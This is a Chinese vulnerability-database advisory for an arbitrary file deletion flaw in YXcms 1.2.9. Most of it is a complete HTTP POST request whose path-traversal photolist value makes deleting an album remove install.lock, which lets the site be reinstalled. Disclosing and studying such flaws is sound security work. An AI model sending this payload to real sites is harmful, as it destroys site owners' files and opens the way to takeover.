yxcms1.2.9任意文件删除漏洞

基本字段

漏洞编号:
SSV-89494
披露/发现时间:
未知
提交时间:
2015-09-21
漏洞等级:
漏洞类别:
任意文件删除
影响组件:
YXcms
漏洞作者:
未知
提交者:
helit
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 helit 共获得  1.25KB

yxcms1.2.9版本存在任意文件删除漏洞。

漏洞文件:/protected/apps/member/controller/photocontroller.php

添加图集时直接获取图片列表,然后进行入库,对图集进行删除时未对删除图片的路径进行任何过滤,如果文件路径存在,就将上传的文件列表进行遍历删除,在类的初始化有个$this->uploadpath=ROOT_PATH.'upload/photos/';,可以在上传时将上传路径设置为../../protected/apps/install/install.lock,进行删除时,由于判断该文件存在,所以会被删除,删除install.lock可以导致重装。也可以替换为其他文件,导致任意文件删除。


利用方法,注册一个会员然后添加一个图集。

提交:

POST /index.php?r=member/photo/add HTTP/1.1
Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/index.php?r=member/photo/add
Cookie: bbs_sid=34cf0a07df3b79fb; a8850_times=1; PHPSESSID=70a6e5039d8221ea68474b07eaef8db4; yx_auth=cb4772IT9B%2FSSgobsYj8GrQvKTHczJmS4ZxPdpN58dJKU360qdaxppL9eHsyfxoEN2ThpZKPZ%2FUPuCTcSKajRg
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 287

sort=%2C000000%2C100002%2C100007&title=testtest3&sort=sef&picture=teste&keywords=testes&description=testes&ifthumb=1&thumbtype=1&width=145&height=110&content=sefsesfes&tpcontent=photo_content&photolist[]=../../protected/apps/install/install.lock


然后删除图集,就能删除安装文件了

Supercheng Near yql丶 @mb1Dex huakai feng 0x153 Tonybreak 等 14  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 0x153 共获得   0KB
登陆后兑换查看

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1949
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负